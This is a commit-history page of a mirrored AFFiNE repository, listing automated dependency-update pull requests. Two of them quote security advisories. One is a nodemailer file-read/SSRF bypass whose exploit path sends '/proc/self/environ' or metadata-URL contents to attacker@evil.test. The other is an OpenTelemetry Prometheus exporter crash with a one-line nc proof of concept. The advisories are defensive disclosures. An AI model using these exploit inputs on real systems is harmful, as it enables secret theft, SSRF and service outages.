mirror of
https://github.com/toeverything/AFFiNE.git
synced 2026-07-11 23:26:30 +08:00
7ea8800c9901db4912e084e94ffb010a0298e99e
266 Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
|
|
7ea8800c99 |
chore: bump up nodemailer version to v9 [SECURITY] (#15134)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [nodemailer](https://nodemailer.com/) ([source](https://redirect.github.com/nodemailer/nodemailer)) | [`^8.0.11` → `^9.0.0`](https://renovatebot.com/diffs/npm/nodemailer/8.0.11/9.0.1) |  |  | --- ### Nodemailer: Message-level raw option bypasses disableFileAccess/disableUrlAccess, enabling arbitrary file read and full-response SSRF in the delivered message [GHSA-p6gq-j5cr-w38f](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f) <details> <summary>More information</summary> #### Details ##### Message-level `raw` option bypasses `disableFileAccess` / `disableUrlAccess`, enabling arbitrary file read and full-response SSRF in the sent message - **Target:** nodemailer/nodemailer, npm `nodemailer` **v9.0.0** (HEAD `4e58450eb490e5097a74b2b2cce35a8d9e21856e`) - **Verdict:** CONFIRMED (local PoC, no network) ##### Summary Nodemailer exposes `disableFileAccess` and `disableUrlAccess` so an application that passes **untrusted** message data to the library can forbid that data from reading local files or fetching URLs. Every attachment, alternative, `html`/`text`/`watchHtml`/`amp` and `icalEvent` content node honors these flags. **The message-level `raw` option does not.** `MailComposer.compile()` builds the root MIME node for a `raw` message **without** threading the two flags, so a `raw: { path: '/etc/passwd' }` or `raw: { href: 'http://169.254.169.254/…' }` message is read / fetched anyway, and the file or HTTP-response bytes become the **actual message that is sent** by every transport (SMTP, SES, sendmail, stream, JSON). An actor whose input the application intended to sandbox therefore obtains arbitrary local-file disclosure and a full-response SSRF primitive, delivered to a recipient the same actor can choose. This is the same vulnerability class as the already-published jsonTransport advisory **GHSA-wqvq-jvpq-h66f**, but a **distinct code path** (`raw` root node, not `normalize()`), and strictly higher impact: the jsonTransport bug only affected the locally-returned JSON, whereas this affects the delivered RFC822 message for all transports. ##### Affected component - `lib/mail-composer/index.js:34-35` — root cause: ```js if (this.mail.raw) { this.message = new MimeNode('message/rfc822', { newline: this.mail.newline }).setRaw(this.mail.raw); } ``` The `MimeNode` is constructed with only `{ newline }`. Compare the sibling node builders `_createMixed`/`_createAlternative`/`_createRelated`/`_createContentNode` (`lib/mail-composer/index.js:389-527`), which all pass `disableUrlAccess: this.mail.disableUrlAccess, disableFileAccess: this.mail.disableFileAccess`. - `lib/mime-node/index.js:51-52` — the constructor derives `this.disableFileAccess`/ `this.disableUrlAccess` solely from its own `options`; children do **not** inherit a parent's flags (`createChild`/`appendChild`, lines 175-194, pass options through verbatim). - `lib/mime-node/index.js:812` — `setRaw()` content is resolved through `this._getStream(this._raw)`. - `lib/mime-node/index.js:984-1010` — `_getStream` reads the file (`fs.createReadStream`, 995) or fetches the URL (`nmfetch`, 1009) **only guarded by `this.disableFileAccess`/`this.disableUrlAccess`**, which on the `raw` root node are `false`. - Reached from the normal send flow at `lib/mailer/index.js:188` (`mail.message = new MailComposer(mail.data).compile()`), so every transport is affected. ##### Reachability gate (hop-by-hop) 1. **Source.** Application calls `transporter.sendMail({ raw: <userControlled> , to: <userControlled> })` with `disableFileAccess: true` and/or `disableUrlAccess: true` configured on the transporter (forced onto `mail.data` in `lib/mailer/mail-message.js:36-40`) or per message. This is the exact scenario the flags exist for — the same precondition under which GHSA-wqvq-jvpq-h66f was accepted. 2. **Guard — the access flags.** For attachments the flag is enforced: a node created by `_createContentNode` carries `disableFileAccess`, so `_getStream` throws `EFILEACCESS`. **Bypass:** the `raw` branch (`compile():34-35`) never sets the flag on its node, so `this.disableFileAccess === false` and the guard at `mime-node:985` / `:999` is skipped. There is no other validation between `mail.raw` and the read; `raw` content shapes (`{path}`, `{href}`, stream, string, buffer) are accepted as-is by `setRaw`/`_getStream`. 3. **Sink.** `fs.createReadStream(content.path)` (file disclosure) or `nmfetch(content.href, …)` (SSRF). The resulting bytes are emitted as the message body by `createReadStream()`, which every transport pipes to its destination (`smtp-transport:233`, `smtp-pool/pool-resource:208`, `ses-transport:96`, `sendmail-transport:184`, `stream-transport:67`). No guard blocks the chain; the only guard (the access flags) is structurally absent on this node. ##### Root cause Inconsistent enforcement: the access policy is applied per-`MimeNode` via constructor options and must be re-passed at every node creation. The `raw`-message shortcut in `compile()` omits it, while all five other node builders include it. The flags are therefore enforced for every content type *except* the one that lets the caller supply a complete message body by path/URL. ##### Exploit path Application that sandboxes untrusted mail input (`disableFileAccess`/`disableUrlAccess` set): 1. Untrusted actor supplies `raw: { path: '/proc/self/environ' }` (or any server file: `/app/.env`, key material, etc.) and `to: attacker@evil.test`. 2. `compile()` builds the raw root node without the flags; the transport reads the file and sends its contents as the message → **arbitrary server-file exfiltration to an attacker-chosen mailbox.** 3. Alternatively `raw: { href: 'http://127.0.0.1:8080/admin' }` or a cloud metadata URL → Nodemailer fetches it server-side and delivers the full response body in the email → **full-response SSRF** (no blind-channel limitation). ##### Impact - **Confidentiality (High):** arbitrary local file read disclosed in the outgoing message; full-response SSRF to internal/metadata endpoints, also disclosed in the message. - **Integrity (Low):** attacker-fetched/file content is injected into the delivered mail. - The two protective flags an application relies on to contain untrusted input are silently ineffective for `raw`. ##### Preconditions The application (a) passes `disableFileAccess` and/or `disableUrlAccess` (the documented sandboxing flags) and (b) lets untrusted input influence the `raw` field (and, for maximal disclosure, `to`). No other configuration is required; all bundled transports are affected. This mirrors the accepted precondition of GHSA-wqvq-jvpq-h66f. ##### Severity - **AV** — message data routinely originates over the network in the apps these flags protect. - **AC** — a single crafted `raw` object; deterministic. - **PR** — the actor is a user whose input the app already treats as untrusted (the reason the flags are set); not fully anonymous in the typical deployment. - **UI** — no victim interaction. - **S** — impact within Nodemailer's process scope. - **C** — arbitrary file read **and** full-response SSRF, both delivered to an attacker-chosen recipient. (The sibling jsonTransport advisory used C:L because its leak stayed in locally-returned JSON; here the bytes leave the system in the sent message, so C:H is warranted.) - **I** — attacker injects fetched/file bytes into the outgoing message. - **A**. Note: if a deployment fixes the recipient (`to` not attacker-controlled) the disclosure channel narrows and the rating degrades toward the sibling's Medium; the High rating reflects the reasonable worst case where `raw` and `to` are both untrusted. ##### Adversarial re-read (attempts to refute) 1. **"`raw` content is by-design trusted, so the flags shouldn't apply."** Rejected: every other content path (attachments, alternatives, html/text, icalEvent) honors the flags, and the maintainer already accepted GHSA-wqvq-jvpq-h66f for exactly this "untrusted input + flag set" model. The asymmetry — attachment `{path}` is blocked but `raw:{path}` is not — is the bug, and the PoC's CONTROL case proves the flag is otherwise effective on the same file. 2. **"The raw node inherits the flags via rootNode."** Rejected by code and by PoC: `compile():35` constructs the node with `{ newline }` only; `MimeNode` constructor sets `this.disableFileAccess = !!options.disableFileAccess` → `false`; `rootNode` is itself; no inheritance exists. 3. **"The PoC leaks for an unrelated reason."** Rejected: the CONTROL message (`attachments:[{path}]`, same file, same transporter) returns `EFILEACCESS`; only the `raw:{path}` message leaks. The sentinel nonce exists solely in the temp file; the URL nonce is generated server-side and is only obtainable by an actual fetch. Both observables are uniquely bound to the bypass. 4. **"Maybe only jsonTransport (already reported) is affected."** Rejected: the PoC uses `streamTransport` and the root cause is in `MailComposer.compile()` (`mailer:188`), shared by all transports; jsonTransport is a different (already-fixed) path. I could not find any guard that blocks the chain; the finding survives. ##### Proof of concept (safe, benign) `findings/nodemailer/raw/poc-raw-fileaccess-bypass.js` — local, no network egress (loopback only), no destructive action. Output: ``` [CONTROL] attachment path with disableFileAccess: BLOCKED (EFILEACCESS) — flag works here [ATTACK] raw:{path} with disableFileAccess=true: BYPASSED — sentinel file CONTENT present in message [ATTACK] raw:{href} with disableUrlAccess=true (loopback server): BYPASSED — fetched body present (SSRF) VERDICT: CONFIRMED ``` Run: `node findings/nodemailer/raw/poc-raw-fileaccess-bypass.js` (exit 0 = confirmed). ##### Remediation Thread the access policy onto the `raw` root node, exactly as the other builders do: ```js if (this.mail.raw) { this.message = new MimeNode('message/rfc822', { newline: this.mail.newline, disableFileAccess: this.mail.disableFileAccess, disableUrlAccess: this.mail.disableUrlAccess }).setRaw(this.mail.raw); } ``` (Defense in depth: `setRaw`/`_getStream` could also refuse `{path}`/`{href}` raw content when either flag is set, regardless of how the node was constructed.) Add a regression test asserting that `raw:{path}` and `raw:{href}` reject with `EFILEACCESS`/`EURLACCESS` when the flags are set, mirroring the attachment tests. #### Severity - CVSS Score: 7.1 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N` #### References - [https://github.com/nodemailer/nodemailer/security/advisories/GHSA-p6gq-j5cr-w38f](https://redirect.github.com/nodemailer/nodemailer/security/advisories/GHSA-p6gq-j5cr-w38f) - [https://github.com/advisories/GHSA-p6gq-j5cr-w38f](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>nodemailer/nodemailer (nodemailer)</summary> ### [`v9.0.1`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#901-2026-06-17) [Compare Source](https://redirect.github.com/nodemailer/nodemailer/compare/v9.0.0...v9.0.1) ##### Bug Fixes - enforce disableFileAccess/disableUrlAccess for raw message option ([a82e060](https://redirect.github.com/nodemailer/nodemailer/commit/a82e060d978f27e5f41369a9a9807b1e3dedc2e2)) ### [`v9.0.0`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#900-2026-06-14) [Compare Source](https://redirect.github.com/nodemailer/nodemailer/compare/v8.0.11...v9.0.0) ##### ⚠ BREAKING CHANGES - HTTPS requests made while fetching remote content (attachment href/path URLs, OAuth2 token endpoints, HTTP/HTTPS proxy CONNECT) now validate the server's TLS certificate by default. Requests to hosts with self-signed, expired, or hostname-mismatched certificates that previously succeeded will now fail. Opt back out per request with tls.rejectUnauthorized=false (transport options, or a per-attachment `tls` option). ##### Bug Fixes - replace deprecated url.parse with a WHATWG URL wrapper ([0c080fb](https://redirect.github.com/nodemailer/nodemailer/commit/0c080fbf3278926f013a5c2ad06f5f6f0e18f5ed)) - validate TLS certificates by default when fetching remote content ([6a947ac](https://redirect.github.com/nodemailer/nodemailer/commit/6a947ac7114a16da1e6a50d9a6f4e17026ce145d)) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
154d9e975d | fix: deps & config (#15126) | ||
|
|
d500e472f0 | chore: bump deps (#15124) | ||
|
|
7123595831 |
chore: bump deps (#15059)
#### PR Dependency Tree * **PR #15059** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Configurable minimum account age before new accounts can invite members or create share links (default: 24 hours). * Sign-in now returns and caches user info for improved session handling. * **Bug Fixes** * Queue handling accepts and resolves job IDs with special characters. * Improved clipboard/rich-text caret handling and nested-list paste reliability. * Calendar tests use dynamic current-month dates. * AI search returns explicit "No matching documents" when none found. * Auth session responses are explicitly non-cacheable. * **Chores** * Dependency and toolchain bumps; admin UI config/schema exposes the new account-age setting. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
2bd920fea6 |
chore: bump up @inquirer/prompts version to v8 (#15025)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@inquirer/prompts](https://redirect.github.com/SBoudrias/Inquirer.js/blob/main/packages/prompts/README.md) ([source](https://redirect.github.com/SBoudrias/Inquirer.js)) | [`^7.10.1` → `^8.0.0`](https://renovatebot.com/diffs/npm/@inquirer%2fprompts/7.10.1/8.5.0) |  |  | --- ### Release Notes <details> <summary>SBoudrias/Inquirer.js (@​inquirer/prompts)</summary> ### [`v8.5.0`](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.3...5ca6d1101d5d3f8fb066cd5b389bccfdafbbe0c0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.3...@inquirer/prompts@8.5.0) ### [`v8.4.3`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.3) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.2...@inquirer/prompts@8.4.3) - Fix: Windows rendering bug - Fix: Preserve exact literal types in `choices` array (Typescript only) - Fix: Allow input `default` value to be of type `undefined` (Typescript only) - Bump dependencies ### [`v8.4.2`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.2) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.1...@inquirer/prompts@8.4.2) - Fix: some Windows terminals would freeze and not react to keypresses. ### [`v8.4.1`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.1) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.0...@inquirer/prompts@8.4.1) - Improve `expand` prompt type inferrence. ### [`v8.4.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.3.2...@inquirer/prompts@8.4.0) - Feat: Added a loading message while validating editor prompt input. - Type improvement: Better type inference with checkbox, search and expand prompts. - Fix: `editor` prompt not always properly handling editor path on windows. ### [`v8.3.2`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.3.2) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.3.1...@inquirer/prompts@8.3.2) - Fix broken 8.3.1 release process. ### [`v8.3.1`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.3.1) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.3.0...@inquirer/prompts@8.3.1) - Bump dependencies ### [`v8.3.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.3.0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.2.1...@inquirer/prompts@8.3.0) - Fix: Keypresses happening before a prompt is rendered are now ignored. - Fix (checkbox): Element who're both checked and disabled are now always included in the returned array. - Feat (select/checkbox): Cursor will now hover disabled options of the list; but they still cannot be interacted with. This prevents the cursor jumping ahead in ways that can be confusing. - Feat: various new theme options to make all prompts content localizable. Finally, see our new [`@inquirer/i18n` package](https://redirect.github.com/SBoudrias/Inquirer.js/tree/main/packages/i18n)! ### [`v8.2.1`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.2.1) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.2.0...@inquirer/prompts@8.2.1) - chore: Switch `wrap-ansi` with `fast-wrap-ansi` ### [`v8.2.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.2.0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.1.0...@inquirer/prompts@8.2.0) - feat(`search`): Add support for `default`. - feat(`rawlist`): Add support for `description` of choices. That information is displayed under the list when the choice is highlighted. - Bump dependencies ### [`v8.1.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.1.0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.2...@inquirer/prompts@8.1.0) - Feat: `rawlist` now supports `default` option. - Fix: `select` now infer return type properly when passing a `choices` array of string literals. ### [`v8.0.2`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.0.2) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.1...@inquirer/prompts@8.0.2) - Fix Typescript not discovering types when `moduleResolution` is set to `commonjs` (you probably want to fix that in your project if it's still in your tsconfig) ### [`v8.0.1`](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.0...@inquirer/prompts@8.0.1) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.0...@inquirer/prompts@8.0.1) ### [`v8.0.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.0.0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@7.10.1...@inquirer/prompts@8.0.0) ### Release Notes #### 🚨 Breaking Changes This is a major release that modernizes the codebase for Node.js ≥ 20. ##### ESM Only - No More CommonJS Support **Impact:** All packages are now ESM-only. CommonJS imports are no longer supported. If you're on modern Node versions (≥ 20), this should be transparent and have no impact. ##### Node.js Version Requirement **Minimum Node.js version is now 20.x** Node.js versions below 20 are no longer supported. Please upgrade to Node.js 20 or later. Node min versions: `>=23.5.0 || ^22.13.0 || ^21.7.0 || ^20.12.0` ##### Deprecated APIs Removed The following deprecated APIs have been removed after being deprecated in previous releases: ##### `list` prompt alias removed (affects `inquirer` package only) The `list` alias has been removed from the `inquirer` package. This only impacts users of the legacy `inquirer` package, not users of `@inquirer/prompts` or individual prompt packages. ```js // ❌ No longer available (inquirer package only) import inquirer from 'inquirer'; const answer = await inquirer.prompt([ { type: 'list', name: 'choice', message: 'Pick one:', choices: ['a', 'b'] } ]); // ✅ Use 'select' instead import inquirer from 'inquirer'; const answer = await inquirer.prompt([ { type: 'select', name: 'choice', message: 'Pick one:', choices: ['a', 'b'] } ]); ``` ##### `helpMode` theme property removed ```js // ❌ No longer available const answer = await select({ theme: { helpMode: 'never' } }); // ✅ Use theme.style.keysHelpTip instead const answer = await select({ theme: { style: { keysHelpTip: () => undefined // or your custom styling function } } }); ``` This affects the following prompts: - `@inquirer/checkbox` - `@inquirer/search` - `@inquirer/select` ##### `instructions` config property removed ```js // ❌ No longer available const answer = await checkbox({ instructions: 'Custom instructions' }); // ✅ Use theme.style.keysHelpTip instead const answer = await checkbox({ theme: { style: { keysHelpTip: (text) => 'Custom instructions' } } }); ``` This affects the following prompts: - `@inquirer/checkbox` - `@inquirer/search` - `@inquirer/select` ##### `cancel()` method removed The `cancel()` method on prompt return custom `Promise` has been removed. ```js // ❌ No longer available const answerPromise = input({ message: 'Name?' }); answerPromise.cancel(); const answer = await answerPromise; // ✅ Use AbortSignal instead const controller = new AbortController(); const answer = await input( { message: 'Name?' }, { signal: controller.signal } ); controller.abort(); ``` ##### Color Library Change: yoctocolors → Node.js `styleText` **Internal change:** The project now uses Node.js built-in `util.styleText()` instead of the `yoctocolors` package for terminal colors. This makes Inquirer smaller and reduces risks of vulnerabilities coming from transitive dependencies. </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
b3b9c54a89 |
chore: bump up @types/nodemailer version to v8 (#15026)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@types/nodemailer](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/nodemailer) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/nodemailer)) | [`^7.0.0` → `^8.0.0`](https://renovatebot.com/diffs/npm/@types%2fnodemailer/7.0.9/8.0.0) |  |  | --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
6d1172ba44 | chore: bump deps | ||
|
|
659072183c | chore: bump deps | ||
|
|
f19a922793 |
chore: bump up @opentelemetry/sdk-node version to ^0.217.0 [SECURITY] (#14945)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.215.0` → `^0.217.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.215.0/0.217.0) |  |  | --- ### Prometheus exporter process crash via malformed HTTP request [CVE-2026-44902](https://nvd.nist.gov/vuln/detail/CVE-2026-44902) / [GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3) <details> <summary>More information</summary> #### Details ##### Summary A single malformed HTTP request crashes any Node.js process running the OpenTelemetry JS Prometheus exporter. The metrics endpoint (default `0.0.0.0:9464`) has no error handling around URL parsing, so a request with an invalid URI causes an uncaught `TypeError` that terminates the process. **You are affected by this vulnerability if either of the following apply to your application:** * you directly use `@opentelemetry/exporter-prometheus` in your code through its built-in server. * your `OTEL_METRICS_EXPORTER` environment variable includes `prometheus` **AND** * you use `@opentelemetry/sdk-node` * you use `@opentelemetry/auto-instrumentations-node` via `--require @​opentelemetry/auto-instrumentations-node/register`/`--import @​opentelemetry/auto-instrumentations-node/register` ##### Impact **Denial of service.** Any application using the OpenTelemetry Prometheus exporter’s built-in server can be crashed by a single unauthenticated network packet sent to the metrics port. No authentication, special privileges, or prior access is required. ##### Remediation ##### Update to the fixed version Update `@opentelemetry/exporter-prometheus` and `@opentelemetry/sdk-node` to version **0.217.0** or later. Update `@opentelemetry/auto-instrumentations-node` to version **0.75.0** or later. This release adds proper error handling around the URL constructor, returning an HTTP `400` response on parse failure rather than allowing the exception to propagate and crash the process. ``` npm install @​opentelemetry/exporter-prometheus@latest ``` ##### Do Not Expose the Endpoint to Untrusted Users > [!IMPORTANT] > The following mitigations reduce exposure but do not fully remediate the vulnerability. Any client that *can* reach the metrics endpoint - including your own Prometheus scraper host if compromised - could still trigger the crash. Updating to **0.217.0** is the recommended resolution. If updating is not immediately feasible, restrict access to the metrics endpoint so that it is not reachable by untrusted or unauthenticated network clients. For example: * **Bind to localhost only** by setting the `host` option to `127.0.0.1` when configuring the `PrometheusExporter`, so the port is not exposed on public or shared network interfaces * **Use a firewall or network policy** to restrict access to port `9464` (or whichever port you have configured) to only trusted Prometheus scrape hosts * **Place the endpoint behind a reverse proxy** that filters or validates incoming requests before they reach the exporter ##### Details In `PrometheusExporter.ts`, the `_requestHandler` calls `new URL(request.url, this._baseUrl)` without any error handling. Node's HTTP parser accepts absolute-form URIs (e.g. `http://`) for proxy compatibility, including malformed ones. When `request.url` is `"http://"`, the `URL` constructor throws `TypeError: Invalid URL`. Since there is no try-catch in the handler, the exception propagates as an uncaught exception and crashes the process. The Prometheus metrics endpoint is unauthenticated by design (Prometheus scrapes it) and binds to `0.0.0.0` by default, meaning it is reachable by any network client that can connect to the metrics port. ##### Proof of Concept Start any Node.js application with the Prometheus exporter running on the default port `9464`, then send a single raw TCP packet: ``` echo -ne 'GET http:// HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc localhost 9464 ``` The process crashes immediately with: ``` TypeError: Invalid URL at new URL (...) at PrometheusExporter._requestHandler (...) ``` #### Severity - CVSS Score: 7.5 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` #### References - [https://github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3) - [https://github.com/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>open-telemetry/opentelemetry-js (@​opentelemetry/sdk-node)</summary> ### [`v0.217.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c) ### [`v0.216.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - "" - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNTkuMiIsInVwZGF0ZWRJblZlciI6IjQzLjE1OS4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
ac6d0d35af |
chore: bump up @opentelemetry/exporter-prometheus version to ^0.217.0 [SECURITY] (#14944)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.215.0` → `^0.217.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.215.0/0.217.0) |  |  | --- ### Prometheus exporter process crash via malformed HTTP request [CVE-2026-44902](https://nvd.nist.gov/vuln/detail/CVE-2026-44902) / [GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3) <details> <summary>More information</summary> #### Details ##### Summary A single malformed HTTP request crashes any Node.js process running the OpenTelemetry JS Prometheus exporter. The metrics endpoint (default `0.0.0.0:9464`) has no error handling around URL parsing, so a request with an invalid URI causes an uncaught `TypeError` that terminates the process. **You are affected by this vulnerability if either of the following apply to your application:** * you directly use `@opentelemetry/exporter-prometheus` in your code through its built-in server. * your `OTEL_METRICS_EXPORTER` environment variable includes `prometheus` **AND** * you use `@opentelemetry/sdk-node` * you use `@opentelemetry/auto-instrumentations-node` via 